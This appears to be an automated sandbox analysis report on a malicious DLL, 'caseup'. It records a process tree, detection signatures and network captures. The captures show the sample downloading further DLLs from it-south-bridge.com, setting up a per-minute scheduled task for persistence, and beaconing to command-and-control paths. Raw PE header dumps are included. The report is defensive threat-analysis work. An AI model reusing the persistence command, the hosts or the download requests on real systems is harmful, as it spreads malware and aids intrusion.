Edit tour

Windows Analysis Report
caseup.exe

Overview

General Information

Sample Name:	caseup.exe (renamed file extension from exe to dll)
Analysis ID:	742971
MD5:	b32f33fb26ea59675dc95563fd68b4bc
SHA1:	c78615f0775cd411c42afa37c1ab57bfaf9cb398
SHA256:	daa78ec9ac5ba2efffe8ee414c348e2eafa787e341dea0ac83f602b56520fa75
Infos:

Detection

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

System process connects to network (likely due to code injection or exploit)

Multi AV Scanner detection for submitted file

Multi AV Scanner detection for dropped file

Sigma detected: Schedule system process

Uses known network protocols on non-standard ports

Uses schtasks.exe or at.exe to add and modify task schedules

Found decision node followed by non-executed suspicious APIs

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Uses a known web browser user agent for HTTP communication

May sleep (evasive loops) to hinder dynamic analysis

Detected TCP or UDP traffic on non-standard ports

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Found large amount of non-executed APIs

Uses Microsoft's Enhanced Cryptographic Provider

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Downloads executable code via HTTP

Classification

Process Tree

System is w7x64

loaddll64.exe (PID: 2080 cmdline: loaddll64.exe "C:\Users\user\Desktop\caseup.dll" MD5: C676FC0263EDD17D4CE7D644B8F3FCD6)

cmd.exe (PID: 2948 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\caseup.dll",#1 MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

rundll32.exe (PID: 500 cmdline: rundll32.exe "C:\Users\user\Desktop\caseup.dll",#1 MD5: DD81D91FF3B0763C392422865C9AC12E)

rundll32.exe (PID: 772 cmdline: rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain MD5: DD81D91FF3B0763C392422865C9AC12E)

schtasks.exe (PID: 1288 cmdline: "C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN StdntsUpdate /TR "C:\Windows\system32\rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain" /f MD5: 97E0EC3D6D99E8CC2B17EF2D3760E8FC)

rundll32.exe (PID: 1184 cmdline: rundll32.exe C:\Users\user\Desktop\caseup.dll,DllMain MD5: DD81D91FF3B0763C392422865C9AC12E)

rundll32.exe (PID: 1552 cmdline: rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain MD5: DD81D91FF3B0763C392422865C9AC12E)

schtasks.exe (PID: 1688 cmdline: "C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN StdntsUpdate /TR "C:\Windows\system32\rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain" /f MD5: 97E0EC3D6D99E8CC2B17EF2D3760E8FC)

taskeng.exe (PID: 1424 cmdline: taskeng.exe {195B2CF0-9BCC-4145-91B3-37920C07B877} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)

rundll32.exe (PID: 1748 cmdline: C:\Windows\system32\rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain MD5: DD81D91FF3B0763C392422865C9AC12E)

cleanup

Sigma Signatures

Persistence and Installation Behavior

Sigma detected: Schedule system process

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN StdntsUpdate /TR "C:\Windows\system32\rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain" /f, CommandLine: "C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN StdntsUpdate /TR "C:\Windows\system32\rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain" /f, CommandLine|base64offset|contains: *j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\caseup.dll",#1, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 500, ParentProcessName: rundll32.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN StdntsUpdate /TR "C:\Windows\system32\rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain" /f, ProcessId: 1288, ProcessName: schtasks.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: caseup.dll	ReversingLabs: Detection: 28%
Source: caseup.dll	Virustotal: Detection: 25%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\StndUpdate\UimbTD.dll

ReversingLabs: Detection: 21%

Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30A38A0 BCryptOpenAlgorithmProvider,BCryptCloseAlgorithmProvider,BCryptGenRandom,		1_2_000007FEF30A38A0
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F2EC80 BCryptOpenAlgorithmProvider,BCryptCloseAlgorithmProvider,BCryptGenRandom,		9_2_000007FEF2F2EC80

Source: caseup.dll

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\rundll32.exe	Network Connect: 206.81.11.20 80			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Domain query: it-south-bridge.com

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49174

Source: global traffic	HTTP traffic detected: GET /new_style/UimbTD.dll HTTP/1.1Host: it-south-bridge.com:81User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Accept: /accept-encoding: gzip
Source: global traffic	HTTP traffic detected: GET /new_style/UimbTD.dll HTTP/1.1Host: it-south-bridge.com:81User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Accept: /accept-encoding: gzip
Source: global traffic	HTTP traffic detected: GET /new_style/UimbTD.dll HTTP/1.1Host: it-south-bridge.com:81User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Accept: /accept-encoding: gzip

Source: global traffic

TCP traffic: 192.168.2.22:49171 -> 206.81.11.20:81

Source: Joe Sandbox View

ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 10 Nov 2022 10:43:10 GMTContent-Type: application/octet-streamContent-Length: 1429504Last-Modified: Tue, 08 Nov 2022 16:37:56 GMTConnection: keep-aliveETag: "636a85e4-15d000"X-XSS-Protection: 1; mode=blockAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 56 e4 54 d7 12 85 3a 84 12 85 3a 84 12 85 3a 84 06 ee 3e 85 19 85 3a 84 06 ee 39 85 14 85 3a 84 06 ee 3f 85 97 85 3a 84 92 fe 3f 85 0d 85 3a 84 92 fe 3e 85 1c 85 3a 84 92 fe 39 85 1b 85 3a 84 12 85 3b 84 68 85 3a 84 93 fc 3b 85 1b 85 3a 84 9c fe 3e 85 1e 85 3a 84 12 85 3a 84 1f 85 3a 84 9c fe 3a 85 13 85 3a 84 9c fe c5 84 13 85 3a 84 9c fe 38 85 13 85 3a 84 52 69 63 68 12 85 3a 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 62 15 6a 63 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 21 00 88 0b 00 00 56 0a 00 00 00 00 00 20 ab 0a 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 16 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 70 4d 15 00 48 00 00 00 b8 4d 15 00 64 00 00 00 00 00 16 00 80 03 00 00 00 90 15 00 9c 57 00 00 00 00 00 00 00 00 00 00 00 10 16 00 c0 1b 00 00 30 f6 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 f6 14 00 28 00 00 00 f0 f4 14 00 40 01 00 00 00 00 00 00 00 00 00 00 00 a0 0b 00 78 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 86 0b 00 00 10 00 00 00 88 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 b9 09 00 00 a0 0b 00 00 ba 09 00 00 8c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 90 21 00 00 00 60 15 00 00 10 00 00 00 46 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 9c 57 00 00 00 90 15 00 00 58 00 00 00 56 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 5c 01 00 00 00 f0 15 00 00 02 00 00 00 ae 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$VT:::>:9:?:?:>:9:;h:;:>::::::8:Rich:PEdbjc" !V 0`pMHMdW0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 10 Nov 2022 10:43:11 GMTContent-Type: application/octet-streamContent-Length: 1429504Last-Modified: Tue, 08 Nov 2022 16:37:56 GMTConnection: keep-aliveETag: "636a85e4-15d000"X-XSS-Protection: 1; mode=blockAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 56 e4 54 d7 12 85 3a 84 12 85 3a 84 12 85 3a 84 06 ee 3e 85 19 85 3a 84 06 ee 39 85 14 85 3a 84 06 ee 3f 85 97 85 3a 84 92 fe 3f 85 0d 85 3a 84 92 fe 3e 85 1c 85 3a 84 92 fe 39 85 1b 85 3a 84 12 85 3b 84 68 85 3a 84 93 fc 3b 85 1b 85 3a 84 9c fe 3e 85 1e 85 3a 84 12 85 3a 84 1f 85 3a 84 9c fe 3a 85 13 85 3a 84 9c fe c5 84 13 85 3a 84 9c fe 38 85 13 85 3a 84 52 69 63 68 12 85 3a 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 62 15 6a 63 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 21 00 88 0b 00 00 56 0a 00 00 00 00 00 20 ab 0a 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 16 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 70 4d 15 00 48 00 00 00 b8 4d 15 00 64 00 00 00 00 00 16 00 80 03 00 00 00 90 15 00 9c 57 00 00 00 00 00 00 00 00 00 00 00 10 16 00 c0 1b 00 00 30 f6 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 f6 14 00 28 00 00 00 f0 f4 14 00 40 01 00 00 00 00 00 00 00 00 00 00 00 a0 0b 00 78 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 86 0b 00 00 10 00 00 00 88 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 b9 09 00 00 a0 0b 00 00 ba 09 00 00 8c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 90 21 00 00 00 60 15 00 00 10 00 00 00 46 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 9c 57 00 00 00 90 15 00 00 58 00 00 00 56 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 5c 01 00 00 00 f0 15 00 00 02 00 00 00 ae 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$VT:::>:9:?:?:>:9:;h:;:>::::::8:Rich:PEdbjc" !V 0`pMHMdW0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 10 Nov 2022 10:43:13 GMTContent-Type: application/octet-streamContent-Length: 1429504Last-Modified: Tue, 08 Nov 2022 16:37:56 GMTConnection: keep-aliveETag: "636a85e4-15d000"X-XSS-Protection: 1; mode=blockAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 56 e4 54 d7 12 85 3a 84 12 85 3a 84 12 85 3a 84 06 ee 3e 85 19 85 3a 84 06 ee 39 85 14 85 3a 84 06 ee 3f 85 97 85 3a 84 92 fe 3f 85 0d 85 3a 84 92 fe 3e 85 1c 85 3a 84 92 fe 39 85 1b 85 3a 84 12 85 3b 84 68 85 3a 84 93 fc 3b 85 1b 85 3a 84 9c fe 3e 85 1e 85 3a 84 12 85 3a 84 1f 85 3a 84 9c fe 3a 85 13 85 3a 84 9c fe c5 84 13 85 3a 84 9c fe 38 85 13 85 3a 84 52 69 63 68 12 85 3a 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 62 15 6a 63 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 21 00 88 0b 00 00 56 0a 00 00 00 00 00 20 ab 0a 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 16 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 70 4d 15 00 48 00 00 00 b8 4d 15 00 64 00 00 00 00 00 16 00 80 03 00 00 00 90 15 00 9c 57 00 00 00 00 00 00 00 00 00 00 00 10 16 00 c0 1b 00 00 30 f6 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 f6 14 00 28 00 00 00 f0 f4 14 00 40 01 00 00 00 00 00 00 00 00 00 00 00 a0 0b 00 78 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 86 0b 00 00 10 00 00 00 88 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 b9 09 00 00 a0 0b 00 00 ba 09 00 00 8c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 90 21 00 00 00 60 15 00 00 10 00 00 00 46 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 9c 57 00 00 00 90 15 00 00 58 00 00 00 56 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 5c 01 00 00 00 f0 15 00 00 02 00 00 00 ae 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$VT:::>:9:?:?:>:9:;h:;:>::::::8:Rich:PEdbjc" !V 0`pMHMdW0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 10 Nov 2022 10:43:50 GMTContent-Type: application/octet-streamContent-Length: 1694720Last-Modified: Tue, 08 Nov 2022 16:39:00 GMTConnection: keep-aliveETag: "636a8624-19dc00"X-XSS-Protection: 1; mode=blockAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e6 18 e2 e2 a2 79 8c b1 a2 79 8c b1 a2 79 8c b1 b6 12 88 b0 a9 79 8c b1 b6 12 8f b0 a4 79 8c b1 b6 12 89 b0 27 79 8c b1 22 02 89 b0 bd 79 8c b1 22 02 88 b0 ac 79 8c b1 22 02 8f b0 ab 79 8c b1 23 00 8d b0 a6 79 8c b1 b6 12 8d b0 a7 79 8c b1 a2 79 8d b1 33 79 8c b1 2c 02 88 b0 ae 79 8c b1 a2 79 8c b1 af 79 8c b1 2c 02 8c b0 a3 79 8c b1 2c 02 73 b1 a3 79 8c b1 2c 02 8e b0 a3 79 8c b1 52 69 63 68 a2 79 8c b1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 a2 15 6a 63 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 21 00 62 0e 00 00 8a 0b 00 00 00 00 00 7c 71 0d 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 1a 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 60 3d 19 00 48 00 00 00 a8 3d 19 00 64 00 00 00 00 00 1a 00 80 03 00 00 00 80 19 00 90 6c 00 00 00 00 00 00 00 00 00 00 00 10 1a 00 6c 1f 00 00 30 c6 18 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 c6 18 00 28 00 00 00 f0 c4 18 00 40 01 00 00 00 00 00 00 00 00 00 00 00 80 0e 00 38 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 61 0e 00 00 10 00 00 00 62 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 04 cc 0a 00 00 80 0e 00 00 ce 0a 00 00 66 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d0 26 00 00 00 50 19 00 00 14 00 00 00 34 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 90 6c 00 00 00 80 19 00 00 6e 00 00 00 48 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 5c 01 00 00 00 f0 19 00 00 02 00 00 00 b6 19 00 00 00 Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$yyyyy'y"y"y"y#yyy3y,yyy,y,sy,yRichyPEdjc" !b\|q0``=H=dll0

Source: rundll32.exe, 00000009.00000002.1412209832.0000000000369000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://it-south-bridge.com/
Source: rundll32.exe, 00000009.00000002.1412209832.0000000000369000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://it-south-bridge.com/8
Source: rundll32.exe, 00000009.00000002.1412209832.0000000000369000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://it-south-bridge.com/XbnZ/XmznAcQ/f1c6af4d-2957-f0a9-941e-8fbbf2c3576a/TrxZ
Source: loaddll64.exe, 00000001.00000002.915088706.0000000000338000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.907650926.000000000015E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://it-south-bridge.com:81/new_style/UimbTD.dll
Source: rundll32.exe, 00000004.00000002.896065085.00000000002DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://it-south-bridge.com:81/new_style/UimbTD.dll.
Source: rundll32.exe, 00000004.00000002.896065085.00000000002DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://it-south-bridge.com:81/new_style/UimbTD.dll.X
Source: loaddll64.exe, 00000001.00000002.915088706.0000000000338000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://it-south-bridge.com:81/new_style/UimbTD.dll=Q&
Source: rundll32.exe, 00000009.00000002.1412158353.000000000032E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://it-south-bridge.com:81/new_style/xMbdNh.dll

Source: unknown

HTTP traffic detected: POST /XbnZ/XmznAcQ HTTP/1.1Host: it-south-bridge.comUser-Agent: Windows-AzureAD-Authentication-Provider/2.0Accept: */*accept-encoding: gzipContent-Length: 744

Source: unknown

DNS traffic detected: queries for: it-south-bridge.com

Source: C:\Windows\System32\loaddll64.exe

Code function: 1_2_000007FEF30B7E38 AcquireSRWLockExclusive,HeapFree,recv,WSAGetLastError,

1_2_000007FEF30B7E38

Source: global traffic	HTTP traffic detected: GET /new_style/UimbTD.dll HTTP/1.1Host: it-south-bridge.com:81User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Accept: /accept-encoding: gzip
Source: global traffic	HTTP traffic detected: GET /new_style/UimbTD.dll HTTP/1.1Host: it-south-bridge.com:81User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Accept: /accept-encoding: gzip
Source: global traffic	HTTP traffic detected: GET /new_style/UimbTD.dll HTTP/1.1Host: it-south-bridge.com:81User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Accept: /accept-encoding: gzip
Source: global traffic	HTTP traffic detected: GET /new_style/xMbdNh.dll HTTP/1.1Host: it-south-bridge.com:81User-Agent: ZLoad-SoftwareAccept: /accept-encoding: gzip
Source: global traffic	HTTP traffic detected: GET /XbnZ/XmznAcQ/f1c6af4d-2957-f0a9-941e-8fbbf2c3576a/TrxZ HTTP/1.1Host: it-south-bridge.comUser-Agent: Windows-AzureAD-Authentication-Provider/2.0Accept: /accept-encoding: gzip
Source: global traffic	HTTP traffic detected: GET /XbnZ/XmznAcQ/f1c6af4d-2957-f0a9-941e-8fbbf2c3576a/TrxZ HTTP/1.1Host: it-south-bridge.comUser-Agent: Windows-AzureAD-Authentication-Provider/2.0Accept: /accept-encoding: gzip
Source: global traffic	HTTP traffic detected: GET /XbnZ/XmznAcQ/f1c6af4d-2957-f0a9-941e-8fbbf2c3576a/TrxZ HTTP/1.1Host: it-south-bridge.comUser-Agent: Windows-AzureAD-Authentication-Provider/2.0Accept: /accept-encoding: gzip
Source: global traffic	HTTP traffic detected: GET /XbnZ/XmznAcQ/f1c6af4d-2957-f0a9-941e-8fbbf2c3576a/TrxZ HTTP/1.1Host: it-south-bridge.comUser-Agent: Windows-AzureAD-Authentication-Provider/2.0Accept: /accept-encoding: gzip
Source: global traffic	HTTP traffic detected: GET /XbnZ/XmznAcQ/f1c6af4d-2957-f0a9-941e-8fbbf2c3576a/TrxZ HTTP/1.1Host: it-south-bridge.comUser-Agent: Windows-AzureAD-Authentication-Provider/2.0Accept: /accept-encoding: gzip
Source: global traffic	HTTP traffic detected: GET /XbnZ/XmznAcQ/f1c6af4d-2957-f0a9-941e-8fbbf2c3576a/TrxZ HTTP/1.1Host: it-south-bridge.comUser-Agent: Windows-AzureAD-Authentication-Provider/2.0Accept: /accept-encoding: gzip
Source: global traffic	HTTP traffic detected: GET /XbnZ/XmznAcQ/f1c6af4d-2957-f0a9-941e-8fbbf2c3576a/TrxZ HTTP/1.1Host: it-south-bridge.comUser-Agent: Windows-AzureAD-Authentication-Provider/2.0Accept: /accept-encoding: gzip
Source: global traffic	HTTP traffic detected: GET /XbnZ/XmznAcQ/f1c6af4d-2957-f0a9-941e-8fbbf2c3576a/TrxZ HTTP/1.1Host: it-south-bridge.comUser-Agent: Windows-AzureAD-Authentication-Provider/2.0Accept: /accept-encoding: gzip
Source: global traffic	HTTP traffic detected: GET /XbnZ/XmznAcQ/f1c6af4d-2957-f0a9-941e-8fbbf2c3576a/TrxZ HTTP/1.1Host: it-south-bridge.comUser-Agent: Windows-AzureAD-Authentication-Provider/2.0Accept: /accept-encoding: gzip
Source: global traffic	HTTP traffic detected: GET /XbnZ/XmznAcQ/f1c6af4d-2957-f0a9-941e-8fbbf2c3576a/TrxZ HTTP/1.1Host: it-south-bridge.comUser-Agent: Windows-AzureAD-Authentication-Provider/2.0Accept: /accept-encoding: gzip
Source: global traffic	HTTP traffic detected: GET /XbnZ/XmznAcQ/f1c6af4d-2957-f0a9-941e-8fbbf2c3576a/TrxZ HTTP/1.1Host: it-south-bridge.comUser-Agent: Windows-AzureAD-Authentication-Provider/2.0Accept: /accept-encoding: gzip
Source: global traffic	HTTP traffic detected: GET /XbnZ/XmznAcQ/f1c6af4d-2957-f0a9-941e-8fbbf2c3576a/TrxZ HTTP/1.1Host: it-south-bridge.comUser-Agent: Windows-AzureAD-Authentication-Provider/2.0Accept: /accept-encoding: gzip
Source: global traffic	HTTP traffic detected: GET /XbnZ/XmznAcQ/f1c6af4d-2957-f0a9-941e-8fbbf2c3576a/TrxZ HTTP/1.1Host: it-south-bridge.comUser-Agent: Windows-AzureAD-Authentication-Provider/2.0Accept: /accept-encoding: gzip
Source: global traffic	HTTP traffic detected: GET /XbnZ/XmznAcQ/f1c6af4d-2957-f0a9-941e-8fbbf2c3576a/TrxZ HTTP/1.1Host: it-south-bridge.comUser-Agent: Windows-AzureAD-Authentication-Provider/2.0Accept: /accept-encoding: gzip
Source: global traffic	HTTP traffic detected: GET /XbnZ/XmznAcQ/f1c6af4d-2957-f0a9-941e-8fbbf2c3576a/TrxZ HTTP/1.1Host: it-south-bridge.comUser-Agent: Windows-AzureAD-Authentication-Provider/2.0Accept: /accept-encoding: gzip
Source: global traffic	HTTP traffic detected: GET /XbnZ/XmznAcQ/f1c6af4d-2957-f0a9-941e-8fbbf2c3576a/TrxZ HTTP/1.1Host: it-south-bridge.comUser-Agent: Windows-AzureAD-Authentication-Provider/2.0Accept: /accept-encoding: gzip
Source: global traffic	HTTP traffic detected: GET /XbnZ/XmznAcQ/f1c6af4d-2957-f0a9-941e-8fbbf2c3576a/TrxZ HTTP/1.1Host: it-south-bridge.comUser-Agent: Windows-AzureAD-Authentication-Provider/2.0Accept: /accept-encoding: gzip
Source: global traffic	HTTP traffic detected: GET /XbnZ/XmznAcQ/f1c6af4d-2957-f0a9-941e-8fbbf2c3576a/TrxZ HTTP/1.1Host: it-south-bridge.comUser-Agent: Windows-AzureAD-Authentication-Provider/2.0Accept: /accept-encoding: gzip
